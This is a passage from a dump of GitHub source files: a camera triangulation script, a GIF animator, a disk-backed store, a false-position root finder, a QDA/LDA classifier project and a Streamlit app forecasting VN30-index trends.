tvec1))\nnp.savetxt(\"../meta_data/camsPos.txt\", arr)\n\nprojM0 = np.hstack((cv2.Rodrigues(rvec0)[0], tvec0))\nprojM1 = np.hstack((cv2.Rodrigues(rvec1)[0], tvec1))\n\np0g_u = cv2.undistortPoints(p0g, A, distCoefs_97f)\np1g_u = cv2.undistortPoints(p1g, A, distCoefs_97f)\n\npoints3d = cv2.triangulatePoints(projM0, projM1, p0g_u, p1g_u)\n\np3 = points3d[:3] / points3d[3, None] \np3.shape\n\nppts, jc = cv2.projectPoints(p3, rvec0, tvec0, A, distCoefs_97f)\nppts.shape\nppts = ppts[:,0,:]\n\nppts[0]\n\nplt.figure(3)\nfor pt in ppts[14:18]:\n cv2.circle(frame0, pt.astype(int), 3, (0,255,255), 2)\nplt.imshow(frame0)\n\ntrackWpts = np.array([[ 4.4759927, 305.8374 , -214.79953 , 212.62338 ],\n [-382.79422 , -113.78936 , -142.68068 , -142.18954 ],\n [ 239.43945 , 92.293106 , -10.213252 , -13.1673565]],\n dtype=np.float32)\n\n\nif 0:\n plt.close('all')\n fnums = np.arange(850,950,10)\n frnum = 100\n for frnum in fnums:\n cap.set(cv2.CAP_PROP_POS_FRAMES,frnum)\n ret, frame = cap.read()\n corners0, gray0 = getCornersFromImg(frame)\n frame0 = cv2.cvtColor(gray0, cv2.COLOR_GRAY2RGB)\n \n ret0, rvec0, tvec0 = cv2.solvePnP(pts_w, corners0, A, None)\n ppts0, jc0 = cv2.projectPoints(trackWpts, rvec0, tvec0, A, distCoefs_97f)\n\n ppts0 = ppts0[:,0,:]\n plt.figure()\n for pt in ppts0:\n cv2.circle(frame0, pt.astype(int), 6, (255,0,255), 4)\n 
plt.imshow(frame0)\n","repo_name":"fabioirigon/3d","sub_path":"src/depth_test.py","file_name":"depth_test.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"19852091441","text":"\"\"\"\nModule bundling all functions needed to animate an ANI file\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport shutil\nfrom PIL import Image\nfrom .helpers import split_ani, write_xyzs, write_pngs\n\n\ndef animate(anifile=None, width=None, height=None, loop=None, bonds_param=None, camera=None):\n \"\"\"Create a gif file from given ANI file\"\"\"\n if width is None:\n width = 1920\n if height is None:\n height = 1080\n if loop is None:\n loop = 0\n if bonds_param is None:\n bonds_param = 1.3\n fname = anifile.split(\".\")[0]\n frames = []\n imgfiles = write_pngs(write_xyzs(split_ani(anifile)), width, height, bonds_param, camera)\n print(\"\")\n for i, imgfile in enumerate(imgfiles):\n print(\"Creating GIF ({0}/{1})\".format(i + 1, len(imgfiles)), end=\"\\r\")\n new_frame = Image.open(imgfile)\n frames.append(new_frame)\n frames[0].save(\"{0}.gif\".format(fname),\n format=\"GIF\",\n append_images=frames[1:],\n save_all=True,\n duration=300,\n loop=loop,\n disposal=2)\n print(\"\\n{0}.gif is created\".format(fname))\n print(\"Deleting directory ANIAnimator_temp\")\n shutil.rmtree(\"ANIAnimator_temp\")\n print(\"Directory ANIAnimator_temp is deleted\")\n","repo_name":"eftalgezer/ANIAnimator","sub_path":"ANIAnimator/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24283209992","text":"from ... 
import serialization\nfrom .store import Store\nfrom collections import namedtuple\nfrom pathlib import Path\nimport contextlib\nimport functools\nimport shutil\nimport tempfile\nimport time\n\n\nPaths = namedtuple('Paths', 'key val')\n\n\ndef retry(on_exceptions=()):\n class Decorator:\n def __init__(self, func):\n self.func = func\n\n def __call__(self, retry_delays, instance, *args, **kwargs):\n for retry_delay in retry_delays:\n try:\n return self.func(instance, *args, **kwargs)\n except on_exceptions:\n time.sleep(retry_delay)\n return self.func(instance, *args, **kwargs)\n\n def __get__(self, instance, owner):\n f = functools.partial(self, instance.retry_delays, instance)\n functools.update_wrapper(f, self.func)\n return f\n return Decorator\n\n\nclass Disk(Store):\n def __init__(self, dir, tmpdir=None, create_dirs=True):\n self.dir = Path(dir)\n self.tmpdir = Path(tmpdir) if tmpdir is not None else self.dir\n self.retry_delays = [0.125, 0.25, 0.5, 1, 2, 4, 8]\n if create_dirs:\n (self.dir / 'keys').mkdir(parents=True, exist_ok=True)\n (self.dir / 'values').mkdir(parents=True, exist_ok=True)\n self.tmpdir.mkdir(parents=True, exist_ok=True)\n elif not self.dir.exists():\n raise ValueError(f'Store Directory {str(self.dir)} does not exist')\n\n def paths(self, key, root=None):\n \"\"\" Key Paths\n\n Parameters\n ----------\n key : CallNode\n The CallNode used as key\n root : Path\n The path the key paths use as root, default is self.dir\n\n Returns\n -------\n (Path, Path, Path)\n The path of the key, tag, and value files respectively\n \"\"\"\n if root is None:\n root = self.dir\n return Paths(key=root / 'keys' / key.sha256(),\n val=root / 'values' / key.sha256())\n\n @retry(on_exceptions=AssertionError)\n def key_invariant(self, key):\n paths = self.paths(key)\n if self.__contains__(key):\n assert paths.key.is_file()\n assert paths.val.is_file()\n else:\n assert not paths.key.is_file()\n assert not paths.val.is_file()\n\n def __contains__(self, key):\n return self.paths(key).key.is_file()\n\n @retry(on_exceptions=(KeyError, FileNotFoundError))\n def _load_value(self, key):\n if __debug__:\n self.key_invariant(key)\n\n if not self.__contains__(key):\n raise KeyError('KeyError: {}'.format(str(key)))\n\n with self.paths(key).val.open() as f:\n return serialization.load(f)\n\n def _load_tags(self, key):\n raise NotImplementedError\n\n def filter(self, *conditions):\n raise NotImplementedError\n\n def _store(self, key, value, **tags):\n with tempfile.TemporaryDirectory(dir=self.tmpdir) as tmpdir:\n tmpdir = Path(tmpdir)\n\n temp_paths = self.paths(key, root=tmpdir)\n real_paths = self.paths(key)\n\n with contextlib.ExitStack() as exit_stack:\n temp_paths.key.parent.mkdir(parents=True, exist_ok=True)\n temp_paths.val.parent.mkdir(parents=True, exist_ok=True)\n key_file = exit_stack.enter_context(temp_paths.key.open('w'))\n val_file = exit_stack.enter_context(temp_paths.val.open('w'))\n serialization.dump(key, key_file)\n serialization.dump(value, val_file)\n # If succeeded, move files\n shutil.copy(temp_paths.key, real_paths.key)\n shutil.copy(temp_paths.val, real_paths.val)\n\n if __debug__:\n self.key_invariant(key)\n\n def remove(self, key):\n paths = self.paths(key)\n paths.key.unlink()\n paths.val.unlink()\n\n def __getstate__(self):\n return self.dir, self.tmpdir, self.retry_delays\n\n def __setstate__(self, state):\n self.dir = state[0]\n self.tmpdir = state[1]\n self.retry_delays = state[2]\n self.dir.mkdir(parents=True, exist_ok=True)\n self.tmpdir.mkdir(parents=True, 
exist_ok=True)\n","repo_name":"equinor/xun","sub_path":"xun/functions/store/disk.py","file_name":"disk.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"}
{"seq_id":"9952148839","text":"import sympy as sp\nimport numpy as np\n\nx = sp.symbols('x')\n\ndef funcion(func):\n    global x\n    return sp.sympify(func)\n\ndef Regla_falsa(ecua, a, b, tolera):\n    global x\n    ecuacion = funcion(ecua)\n    tramo = abs(b-a)\n    fa = ecuacion.evalf(subs={x:a})\n    fb = ecuacion.evalf(subs={x:b})\n    while not(tramo<=tolera):\n        c = b - fb*(a-b)/(fa-fb)\n        fc = ecuacion.evalf(subs={x:c})\n        cambio = np.sign(fa)*np.sign(fc)\n        if cambio>0:\n            tramo = abs(c-a)\n            a = c\n            fa = fc\n        else:\n            tramo = abs(b-c)\n            b = c\n            fb = fc\n\n    return c, tramo\n\nfun = input(\"Enter the function: \")\na = float(input(\"Enter interval endpoint a: \"))\nb = float(input(\"Enter interval endpoint b: \"))\ntol = float(input(\"Enter the tolerance: \"))\n\n#(c,tramo)=Regla_falsa('x**3+x**2+2*x+1',-1,0,0.01)\n(Raiz, Error) = Regla_falsa(fun, a, b, tol)\n\n# OUTPUT\nprint(\"\")\nprint('root: ', Raiz)\nprint('error: ', Error)","repo_name":"esyepesv/Numerical-Analysis","sub_path":"final delivery/Program/S-N-E-N-L/Regla_Falsa.py","file_name":"Regla_Falsa.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"26654178767","text":"\"\"\"\nUniversity of Liege\nELEN0062 - Introduction to machine learning\nProject 1 - Classification algorithms\n\"\"\"\n#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom sre_compile import isstring\nimport numpy as np\n#from code.plot import plot_with_colors\n\nfrom sklearn.base import BaseEstimator, ClassifierMixin\n\n\n\n\nclass QuadraticDiscriminantAnalysis(BaseEstimator, ClassifierMixin):\n\n    def fit(self, X, y, lda=False):\n        \"\"\"Fit a discriminant analysis model using the training set\n        (X, y).\n\n        Parameters\n        ----------\n        X : array-like, shape = [n_samples, n_features]\n            The training input samples.\n\n        y : array-like, shape = [n_samples]\n            The target values.\n\n\n        Returns\n        -------\n        self : object\n            Returns self.\n        \"\"\"\n        # Input validation\n        X = np.asarray(X, dtype=float)\n        if X.ndim != 2:\n            raise ValueError(\"X must be 2 dimensional\")\n\n        y = np.asarray(y)\n        if y.shape[0] != X.shape[0]:\n            raise ValueError(\"The number of samples differs between X and y\")\n\n        self.lda = lda\n\n        # ====================\n        self.priors = dict()\n        self.means = dict()\n        self.covs = dict()\n        self.classes = np.unique(y)  #[0. 1.]\n
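        # Illustrative note (editor's addition, not from the original file):\n        # np.unique returns the sorted class labels, e.g.:\n        #   np.unique([1., 0., 1.])  # array([0., 1.])\n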
for c in self.classes: # for each class\n            X_c = X[y == c]\n            self.priors[c] = X_c.shape[0] / X.shape[0] # class prior: the class's share of the dataset\n            self.means[c] = np.mean(X_c, axis=0) # per-class mean\n\n            if lda:\n                self.covs[c] = np.cov(X, rowvar=False) # covariance matrix of the whole dataset (pooled)\n            else:\n                self.covs[c] = np.cov(X_c, rowvar=False) # per-class covariance matrix\n\n        return self\n        # ====================\n\n\n    def predict(self, X):\n        \"\"\"Predict class for X.\n\n        Parameters\n        ----------\n        X : array-like of shape = [n_samples, n_features]\n            The input samples.\n\n        Returns\n        -------\n        y : array of shape = [n_samples]\n            The predicted classes.\n        \"\"\"\n\n        # ====================\n        return self.predict_proba(X).argmax(axis=1)\n        # ====================\n\n    \n    def predict_proba(self, X):\n        \"\"\"Return probability estimates for the test data X.\n\n        Parameters\n        ----------\n        X : array-like of shape = [n_samples, n_features]\n            The input samples.\n\n        Returns\n        -------\n        p : array of shape = [n_samples, n_classes]\n            The class probabilities of the input samples. Classes are ordered\n            by lexicographic order.\n\n        \"\"\"\n\n        # ====================\n        prob_X = []\n\n        for x in X:\n            prob_x = []\n            for c in self.classes:\n                numerator = self.f(x, self.means[c], self.covs[c]) * self.priors[c]\n                denominator = 0\n                for c2 in self.classes:\n                    denominator += self.f(x, self.means[c2], self.covs[c2]) * self.priors[c2]\n                prob_x.append(round(numerator / denominator, 3))\n            prob_X.append(prob_x)\n\n        return np.array(prob_X)\n        # ====================\n\n    def f(self, x, mean, covmatrix):\n        \"\"\"\n        The density function of a multivariate normal distribution.\n\n        Parameters\n        ---------------\n        x: ndarray(float, dim=2)\n            random vector, N by 1\n        mean: ndarray(float, dim=1 or 2)\n            the mean of x, N by 1\n        covmatrix: ndarray(float, dim=2)\n            the covariance matrix of x, N by N\n        Returns\n        -------\n        density: float\n        \n        \"\"\"\n\n        N = x.size\n\n        temp1 = np.linalg.det(covmatrix) ** (1/2)  # sqrt(det(Sigma)); the density divides by this\n        temp2 = np.exp(-.5 * (x - mean).T @ np.linalg.inv(covmatrix) @ (x - mean))\n\n        return ( 1/( ((2 * np.pi) ** (N/2)) * temp1) ) * temp2\n\ndef compute_accuracy(prediction_classes,testingtargets):\n    \"\"\" Return the mean accuracy on the given test data and labels\n\n    Parameters\n    ----------\n    prediction_classes : array-like of shape [n_samples]\n        Predicted labels for samples.\n\n    testingtargets : array-like of shape [n_samples,] \n        True labels for tested samples.\n\n\n    Returns\n    -------\n    accuracy : float\n        mean accuracy.\n    \"\"\"\n    assert len(prediction_classes) == len(testingtargets), \"In compute_accuracy(), prediction_classes and testingtargets must have the same length\"\n\n    well_predicted_classes = 0\n\n    for sample in range(len(testingtargets)): \n        if prediction_classes[sample] == testingtargets[sample]:\n            well_predicted_classes += 1\n\n    accuracy = well_predicted_classes/len(testingtargets)\n    return accuracy\n\n\n
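# Example call (illustrative; the variable names are hypothetical):\n#\n#     acc = test_method(X_train, y_train, X_test, y_test, fname=None, lda=False)\n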
def test_method(trainingfeatures,trainingtragets,testingfeatures,testingtargets,fname=None, lda=False):\n    \"\"\"\n    Fit a QDA (or LDA) model on the provided data and return its test accuracy\n\n    Parameters\n    ---------------\n    trainingfeatures:array-like of shape [n_samples,n_features]\n        features of training samples.\n\n    trainingtragets:array-like of shape [n_samples,] \n        labels of training samples.\n\n    testingfeatures:array-like of shape [n_samples,n_features]\n        features of testing samples.\n\n    testingtargets:array-like of shape [n_samples,] \n        labels of testing samples.\n\n    fname: str\n        if a name is provided, a plot boundary pdf file is created\n        in the same directory as this file \n    lda: bool\n        True : lda\n        False : qda\n\n    Returns\n    -------\n    accuracy : float\n    \n    \"\"\"\n    qda = QuadraticDiscriminantAnalysis()\n    qda.fit(trainingfeatures, trainingtragets, lda)\n    #proba_per_classes = qda.predict_proba(testingfeatures)\n    prediction_classes = qda.predict(testingfeatures)\n\n    accuracy = compute_accuracy(prediction_classes,testingtargets)\n\n    if fname is not None:\n        if isinstance(fname, str):\n            plot_boundary(fname,qda,testingfeatures, testingtargets, title=fname)\n\n    return accuracy\n\n\ndef qst_3_2():\n    # generate dataset\n    features, labels = make_dataset2(1500,None) \n\n    trainingfeatures = features[300:]\n    trainingtragets = labels[300:]\n    testingfeatures = features[:300]\n    testingtargets = labels[:300]\n\n    qda = QuadraticDiscriminantAnalysis()\n\n    qda.fit(trainingfeatures, trainingtragets, lda=True) \n    plot_boundary(\"3.2_lda_data2\",qda,testingfeatures, testingtargets, title=\"3.2_lda_data2\")\n    proba_per_classes = qda.predict_proba(testingfeatures)\n    prediction_classes = qda.predict(testingfeatures)\n    accuracy = compute_accuracy(prediction_classes,testingtargets)\n    print(\"lda accuracy :\",accuracy)\n\n    qda.fit(trainingfeatures, trainingtragets, lda=False)\n    plot_boundary(\"3.2_qda_data2\",qda,testingfeatures, testingtargets, title=\"3.2_qda_data2\")\n    proba_per_classes = qda.predict_proba(testingfeatures)\n    prediction_classes = qda.predict(testingfeatures)\n    accuracy = compute_accuracy(prediction_classes,testingtargets)\n    print(\"qda accuracy :\",accuracy)\n\n\ndef qst_3_3():\n    #QDA-DT1\n    accuracy_dataset1_qda_tmp = []\n\n    #LDA-DT1\n    accuracy_dataset1_lda_tmp = []\n\n    #QDA-DT2\n    accuracy_dataset2_qda_tmp = []\n\n    #LDA-DT2\n    accuracy_dataset2_lda_tmp = []\n\n\n    for generation in range(5):\n\n        rd = (generation+10)**4-111\n\n        # datasets\n        features2, labels2 = make_dataset2(1500,rd) \n        trainingfeatures2 = features2[300:]\n        trainingtragets2 = labels2[300:]\n        testingfeatures2 = features2[:300]\n        testingtargets2 = labels2[:300]\n\n        features1, labels1 = make_dataset1(1500,rd) \n        trainingfeatures1 = features1[300:]\n        trainingtragets1 = labels1[300:]\n        testingfeatures1 = features1[:300]\n        testingtargets1 = labels1[:300]\n    \n    \n        #QDA-DT1\n        accuracy = test_method(trainingfeatures1,trainingtragets1,testingfeatures1,testingtargets1, lda=False)\n        accuracy_dataset1_qda_tmp.append(accuracy)\n    \n        #QDA-DT2\n        accuracy = test_method(trainingfeatures2, trainingtragets2,testingfeatures2,testingtargets2, lda=False)\n        accuracy_dataset2_qda_tmp.append(accuracy)\n    \n        #LDA-DT1\n        accuracy = test_method(trainingfeatures1, trainingtragets1,testingfeatures1,testingtargets1, lda=True)\n        accuracy_dataset1_lda_tmp.append(accuracy)\n\n        #LDA-DT2\n        accuracy = test_method(trainingfeatures2, trainingtragets2,testingfeatures2,testingtargets2, lda=True)\n        accuracy_dataset2_lda_tmp.append(accuracy)\n\n\n    accuracy_dataset1_qda_tmp = np.array(accuracy_dataset1_qda_tmp)\n    accuracy_dataset1_lda_tmp = np.array(accuracy_dataset1_lda_tmp)\n    accuracy_dataset2_qda_tmp = np.array(accuracy_dataset2_qda_tmp)\n    accuracy_dataset2_lda_tmp = np.array(accuracy_dataset2_lda_tmp)\n\n    #QDA-DT1\n    avg_accuracy_dataset1_qda = np.mean(accuracy_dataset1_qda_tmp) \n    std_deviation_dataset1_qda = np.std(accuracy_dataset1_qda_tmp)\n    print(\"QDA-DT1 acc : \",round(avg_accuracy_dataset1_qda,3) ,\"std : \", round(std_deviation_dataset1_qda,3))\n\n    
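# Each line below reports the mean and standard deviation of accuracy over the\n    # five seeded runs above.\n    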
#QDA-DT2\n    avg_accuracy_dataset2_qda = np.mean(accuracy_dataset2_qda_tmp) \n    std_deviation_dataset2_qda = np.std(accuracy_dataset2_qda_tmp)\n    print(\"QDA-DT2 acc : \",round(avg_accuracy_dataset2_qda,3) ,\"std : \", round(std_deviation_dataset2_qda,3))\n\n    #LDA-DT1\n    avg_accuracy_dataset1_lda = np.mean(accuracy_dataset1_lda_tmp) \n    std_deviation_dataset1_lda = np.std(accuracy_dataset1_lda_tmp)\n    print(\"LDA-DT1 acc : \",round(avg_accuracy_dataset1_lda,3) ,\"std : \", round(std_deviation_dataset1_lda,3))\n\n    #LDA-DT2\n    avg_accuracy_dataset2_lda = np.mean(accuracy_dataset2_lda_tmp) \n    std_deviation_dataset2_lda = np.std(accuracy_dataset2_lda_tmp)\n    print(\"LDA-DT2 acc : \",round(avg_accuracy_dataset2_lda,3) ,\"std : \", round(std_deviation_dataset2_lda,3))\n\n\nif __name__ == \"__main__\":\n    #from data import make_data\n    from plot import plot_boundary\n    from data import make_dataset1, make_dataset2\n\n    qst_3_2()\n    qst_3_3()\n    \n","repo_name":"ippo-m/ELEN0062-1-IML","sub_path":"code/qda.py","file_name":"qda.py","file_ext":"py","file_size_in_byte":10306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"6600312076","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport joblib\n# Importing all required modules \nimport webbrowser as wb\nimport streamlit as st\nimport time\nfrom io import StringIO\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\n\n# -- Set page config\napptitle = 'Predict VN30-index price movement using financial news and technical analysis'\nst.set_page_config(page_title=apptitle, \n                   layout=\"wide\",\n                   page_icon=\"🧊\",\n                   initial_sidebar_state=\"expanded\")\n# page_icon=\"chart_with_upwards_trend\")\n\n# # Unpacking Scaler pkl file\nS_file = open('model_rf.pkl','rb')\n# S_file = open('model_svm.pkl','rb')\nscaler = joblib.load(S_file)\n\n# Function to print the output; converts the numeric ML prediction to a readable string \ndef pred_out(num):\n    if num == 1:\n        st.info('THE VN30-INDEX WILL BE :green[UPTREND]', icon=\"ℹ️\")\n    else:\n        st.info('THE VN30-INDEX WILL BE :red[DOWNTREND]', icon=\"ℹ️\")\n\nst.title('Application :blue[Deep Learning] and :red[Machine Learning] in predicting VN30-index price movement using financial news and technical analysis')\n\n###############################################################################################\nimport plotly.graph_objects as go\ndf = pd.read_csv('vn30-his-2.csv')\ndf['Date'] = pd.to_datetime(df['Date'])\ndf = df.set_index('Date')\n\ntime_periods = {\n    '5 years': pd.date_range(end=df.index[-1], periods=1260, freq=pd.tseries.offsets.BDay()),\n    '1 year': pd.date_range(end=df.index[-1], periods=252, freq=pd.tseries.offsets.BDay()),\n    '6 months': pd.date_range(end=df.index[-1], periods=120, freq=pd.tseries.offsets.BDay()),\n    '3 months': pd.date_range(end=df.index[-1], periods=60, freq=pd.tseries.offsets.BDay()),\n    '1 month': pd.date_range(end=df.index[-1], periods=20, freq=pd.tseries.offsets.BDay()),\n    '2 weeks': pd.date_range(end=df.index[-1], periods=10, freq=pd.tseries.offsets.BDay()),\n    '1 week': pd.date_range(end=df.index[-1], periods=5, freq=pd.tseries.offsets.BDay()),\n\n}\n\nfig = go.Figure(data=[go.Candlestick(x=df.index,\n                                     open=df['Open'],\n                                     high=df['High'],\n                                     low=df['Low'],\n                                     close=df['Close'])])\nfig.update_layout(\n    height=800,\n    showlegend=True,\n    title_text=\"VN30-Index Candlestick chart from 2017 to 
2023\",\n)\n########################################################################################\n# Define dropdown menu label and options\ndropdown_label = 'Select time period'\ndropdown_options = list(time_periods.keys())\n\n# Add dropdown menu to Streamlit app\ntime_period = st.selectbox(dropdown_label, dropdown_options)\n\n# Filter data for selected time period\nstart_date = time_periods[time_period][0]\ndf_filtered = df.loc[start_date:]\n\n# Update candlestick chart data\nfig.update_traces(x=df_filtered.index,\n open=df_filtered['Open'],\n high=df_filtered['High'],\n low=df_filtered['Low'],\n close=df_filtered['Close'])\n# ##########################################################################################\nsma_10_trace = go.Scatter(x=df_filtered.index, y=df_filtered['sma_10'], name='SMA-10', visible=True)\nsma_20_trace = go.Scatter(x=df_filtered.index, y=df_filtered['sma_20'], name='SMA-20', visible=True)\nema_10_trace = go.Scatter(x=df_filtered.index, y=df_filtered['ema_10'], name='EMA-10', visible=True)\nema_20_trace = go.Scatter(x=df_filtered.index, y=df_filtered['ema_20'], name='EMA-20', visible=True)\n\nfig.add_trace(sma_10_trace)\nfig.add_trace(sma_20_trace)\nfig.add_trace(ema_10_trace)\nfig.add_trace(ema_20_trace)\n# Update figure layout to adjust legend and axis labels\nfig.update_layout(\n legend=dict(\n orientation=\"h\",\n yanchor=\"bottom\",\n y=1.02,\n xanchor=\"right\",\n x=1\n ),\n xaxis_title=\"Date\",\n yaxis_title=\"Price\")\n\nfig.update_layout(xaxis_rangeslider_visible=False)\nst.plotly_chart(fig, theme=\"streamlit\", use_container_width=True)\n#########################################################################################\nrsi_7_trace = go.Scatter(x=df_filtered.index, y=df_filtered['rsi_7'], name='RSI-7', visible=True)\nrsi_9_trace = go.Scatter(x=df_filtered.index, y=df_filtered['rsi_9'], name='RSI-9', visible=True)\nrsi_14_trace = go.Scatter(x=df_filtered.index, y=df_filtered['rsi_14'], name='RSI-14', visible=True)\n\nfig_rsi = go.Figure(data=[rsi_7_trace,rsi_9_trace,rsi_14_trace])\n# Update figure layout to adjust legend and axis labels\nfig_rsi.update_layout(\n legend=dict(\n orientation=\"h\",\n yanchor=\"bottom\",\n y=1.02,\n xanchor=\"right\",\n x=1\n ),\n xaxis_title=\"Date\",\n yaxis_title=\"Price\"\n)\n\nfig_rsi.update_layout(xaxis_rangeslider_visible=False)\nst.plotly_chart(fig_rsi, theme=\"streamlit\", use_container_width=True)\n#########################################################################################\nfig2 = go.Figure(data=[go.Table(\n header=dict(values=list(df_filtered.columns)),\n cells=dict(values=[df_filtered.index, df_filtered.Close, df_filtered.Open,\n df_filtered.High, df_filtered.Low, df_filtered.sma_10,\n df_filtered.sma_20,df_filtered.ema_10,df_filtered.ema_20,\n df_filtered.rsi_7, df_filtered.rsi_9, df_filtered.rsi_14]))\n])\n\nfig2.update_layout(\n height=400,\n showlegend=False,\n title_text=\"VN30-Index data table from 2017 to 2023\",\n)\n\n\nst.sidebar.image('bearish-and-bullish-in-stock-market-science-gold-vector-36657484.jpg', width=265)\nst.sidebar.markdown('#### Support tool')\nst.sidebar.markdown('#### VN30-Index data table from 2017 to 2023')\nclick_data = st.sidebar.checkbox('Click here to show out all of historical data of VN30-Index', value=False)\nif click_data:\n st.plotly_chart(fig2, theme=\"streamlit\", use_container_width=True)\n##############################################################################################\nst.header(\"Report model\")\ncol00, col2, col3, col4, col5 = 
st.columns(5)\nwith col00:\n    st.metric(label=\"\", value=\"Label 0\")\nwith col2:\n    st.metric(label=\"Precision label 0\", value=\"76%\")\nwith col3:\n    st.metric(label=\"Recall label 0\", value=\"67%\")\nwith col4:\n    st.metric(label=\"F1-score\", value=\"71%\")\nwith col5:\n    st.metric(label=\"Support\", value=\"142\")\n\ncol01, col6, col7, col8, col9 = st.columns(5)\nwith col01:\n    st.metric(label=\"\", value=\"Label 1\")\nwith col6:\n    st.metric(label=\"Precision label 1\", value=\"74%\")\nwith col7:\n    st.metric(label=\"Recall label 1\", value=\"81%\")\nwith col8:\n    st.metric(label=\"F1-score\", value=\"77%\")\nwith col9:\n    st.metric(label=\"Support\", value=\"161\")\n\ncol13, col1, col10, col11, col12 = st.columns(5)\nwith col10:\n    st.metric(label=\"Accuracy\", value=\"75%\")\nwith col11:\n    st.metric(label=\"F1-score\", value=\"75%\")\nwith col12:\n    st.metric(label=\"Support\", value=\"303\") \n\nimport datetime\n\n# d = st.date_input(\n#     \"When\\'s your birthday\",\n#     datetime.date(2019, 7, 6))\n# st.write('Your birthday is:', d)\n\n\n# cold1, cold2 = st.columns(2)\n# with cold1:\n#     d = st.date_input(\n#         \"Start: \",\n#         datetime.date(2019, 7, 6))\n# with cold2:\n#     d2 = st.date_input(\n#         \"End: \",\n#         datetime.date(2023, 4, 4))\nst.header(\"Forecasting display\")\n########################################################################\nselect_event = st.sidebar.selectbox('#### Methods',\n                                    ['Select','Manual input', 'Upload file','Link Github'])\n\nif select_event == 'Manual input':\n    bid_quality = st.sidebar.number_input(\"bid_quality\", value=66774)\n    bid_volume = st.sidebar.number_input(\"bid_volume\", value=196533544)\n    ask_quality = st.sidebar.number_input(\"ask_quality\", value=58645)\n    ask_volume = st.sidebar.number_input(\"ask_volume\", value=199406752)\n    matching_volume = st.sidebar.number_input(\"matching_volume\", value=7176062)\n    negotiable_volume = st.sidebar.number_input(\"negotiable_volume\", value=100000)\n    positive = st.sidebar.number_input(\"positive\", value=1)\n    negative = st.sidebar.number_input(\"negative\", value=0)\n    SMA_10_lag = st.sidebar.number_input(\"SMA 10 days\", value=630)\n    SMA_20_lag = st.sidebar.number_input(\"SMA 20 days\", value=623)\n    EMA_10_lag = st.sidebar.number_input(\"EMA 10 days\", value=631)\n    EMA_20_lag = st.sidebar.number_input(\"EMA 20 days\", value=626)\n    RSI_7d_lag = st.sidebar.number_input(\"RSI 7 days\", value=79)\n    RSI_9d_lag = st.sidebar.number_input(\"RSI 9 days\", value=71)\n    RSI_14d_lag = st.sidebar.number_input(\"RSI 14 days\", value=61)\n    \n    res_df = pd.DataFrame({'bid_quality':bid_quality, 'bid_volume':bid_volume, 'ask_quality':ask_quality, 'ask_volume':ask_volume,\n                           'matching_volume':matching_volume, 'negotiable_volume':negotiable_volume, 'Positive':positive, 'Negative':negative,\n                           'SMA_10':SMA_10_lag, 'SMA_20':SMA_20_lag, 'EMA_10':EMA_10_lag, 'EMA_20':EMA_20_lag, 'RSI_7d':RSI_7d_lag, \n                           'RSI_9d':RSI_9d_lag, 'RSI_14d':RSI_14d_lag},index=[\"05-05-2023\"])\n    \n    input_Data = [bid_quality,bid_volume, ask_quality, ask_volume, matching_volume, negotiable_volume,\n                  positive, negative, SMA_10_lag, SMA_20_lag, EMA_10_lag, EMA_20_lag, RSI_7d_lag, RSI_9d_lag, RSI_14d_lag] \n    pred = scaler.predict([input_Data])\n    pred_prob = scaler.predict_proba([input_Data])\n    \n    
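# Note: input_Data must keep the same feature order the model was trained with.\n    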
if st.sidebar.button('#### Submit data and make prediction'):\n        st.sidebar.success('Data submitted successfully!', icon=\"✅\")\n        progress_text = \"Operation in progress. Please wait.\"\n        my_bar = st.progress(0, text=progress_text)\n        for percent_complete in range(100):\n            time.sleep(0.1)\n            my_bar.progress(percent_complete + 1, text=progress_text)\n#         with st.spinner('Wait for it...'):\n#             time.sleep(2)\n        st.header(\"Input data\")\n        st.dataframe(res_df,use_container_width=True)\n        pred_out(pred)\n        df_prob = pd.DataFrame({'Downtrend':pred_prob[:,0], 'Uptrend':pred_prob[:,1]},index=[\"05-05-2023\"])\n        df_prob.index = df_prob.index.set_names(\"Probability\")\n        st.header(\"Forecasting result\")\n        st.dataframe(df_prob,use_container_width=True)\n    else:\n        with st.spinner('Wait for it...'):\n            time.sleep(1)\n        st.warning('You did not input the necessary features', icon=\"⚠️\")\n    \nelif select_event == 'Upload file':\n    sample_df = pd.DataFrame({'Number of buy orders': 66774, 'Buy-orders volume':196533544, 'Number of sell orders':58645, 'Sell-orders volume':199406752,\n                              'Order matching volume':107108336, 'Put-through volume':7176062, 'Positive':1, 'Negative':0,\n                              'SMA_10':1020, 'SMA_20':1019, 'EMA_10':1020, 'EMA_20':1019, 'RSI_7d':56, \n                              'RSI_9d':55, 'RSI_14d':54},index=[\"dd-MM-YY\"])\n    if st.sidebar.button('Sample Data'):\n        with st.spinner('Wait for it...'):\n            time.sleep(2)\n        st.write(\"Please upload data like the sample:\")\n        st.dataframe(sample_df)\n#         st.write(sample_df.columns)\n    uploaded_files = st.sidebar.file_uploader(\"Choose a CSV file\")\n    if uploaded_files is not None:\n        bytes_data = uploaded_files.getvalue()\n#         st.sidebar.write(\"filename:\", uploaded_files.name)\n        new_data = pd.read_csv(uploaded_files,index_col=0)\n#         st.write(new_data) \n        X= new_data.iloc[:,:-1]\n        X.columns = [\"Number of buy orders\",\"Buy-orders volume\",\"Number of sell orders\",\"Sell-orders volume\",\"Order matching volume\",\"Put-through volume\",\n                     \"Positive\",\"Negative\",\"SMA_10\",\"SMA_20\",\"EMA_10\",\"EMA_20\",\"RSI_7d\",\"RSI_9d\",\"RSI_14d\"]\n        pred_new = scaler.predict(X)\n        pred_new_prob = scaler.predict_proba(X)\n        \n        df_final = pd.DataFrame({\"Predict\":pred_new,\n                                 'Downtrend':pred_new_prob[:,0], \n                                 'Uptrend':pred_new_prob[:,1]},index=new_data.index)\n        
